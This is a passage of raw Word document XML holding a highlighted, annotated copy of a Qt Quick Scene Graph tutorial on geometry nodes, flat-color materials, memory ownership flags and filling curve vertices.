        <w:t>Custom attribute sets can also created</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, but that is not covered in this example.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00324544" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>do not have any special needs for memory managing the geometry</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, we specify that the</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2132" w:history="1">
        <w:r w:rsidRPr="00AE08BB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">should </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>own the geometry</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00324544" w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu when it is necessary to manage memory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00324544" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>minimize allocations</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reduce memory fragmentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>improve performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it would also be possible</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to make the geometry a member of a</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2133" w:history="1">
        <w:r w:rsidRPr="00AE08BB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subclass, in which case, we would not have set the</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2134" w:anchor="Flag-enum" w:history="1">
        <w:r w:rsidRPr="00AE08BB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode::OwnsGeometry</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>flag.</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00324544" w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu examples.</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QSGFlatColorMaterial</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material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new</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QSGFlatColorMaterial</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material</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setColor</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QColor</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>255</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node</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setMaterial</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material</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        node</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setFlag</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QSGNode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OwnsMaterial</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AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The scene graph API provides a few </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>commonly used material implementations</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In this example we use the</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2135" w:history="1">
        <w:r w:rsidRPr="00324544">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGFlatColorMaterial</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">which will fill the shape defined by the geometry with a solid color. Again we pass the </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ownership of the material to the node, so it can be cleaned up by the scene graph</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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else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node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static_cast</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QSGGeometryNode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oldNode</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geometry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node</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geometry</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geometry</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allocate</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m_segmentCount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AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In the case where the </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML item has changed and we only want to modify the existing node's geometry</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, we cast the</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>oldNode</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to a</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2136" w:history="1">
        <w:r w:rsidRPr="00AE08BB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometryNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">instance and extract it's </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>geometry. In case the segment count has changed, we call</w:t>
      </w:r>
      <w:r w:rsidR="00324544">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2137" w:anchor="allocate" w:history="1">
        <w:r w:rsidRPr="00324544">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGGeometry::allocate</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to make sure it has the right number of vertices.</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QRectF</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bounds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boundingRect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QSGGeometry</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Point2D</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vertices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geometry</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vertexDataAsPoint2D</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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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i </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> m_segmentCount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i</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qreal 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i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qreal</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m_segmentCount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1</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qreal invt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1</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QPointF</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> pos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invt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invt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invt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m_p1</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3</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invt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invt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m_p2</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3</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invt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m_p3</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m_p4</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float</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> x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bounds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x</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pos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x</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bounds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width</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float</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> y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bounds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y</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pos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y</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bounds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height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vertices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i</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set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x</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y</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ln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    node</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>markDirty</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QSGNode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DirtyGeometry</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE08BB" w:rsidRPr="00324544" w:rsidRDefault="00AE08BB" w:rsidP="00AE08BB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To fill</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the geometry, we </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>first extract the vertex array from it</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE08BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since we are using one of the default attribute sets, we can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00324544">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>convenience function</w:t>
      </w:r>
      <w:r w:rsidR="00324544" w:rsidRPr="00324544">
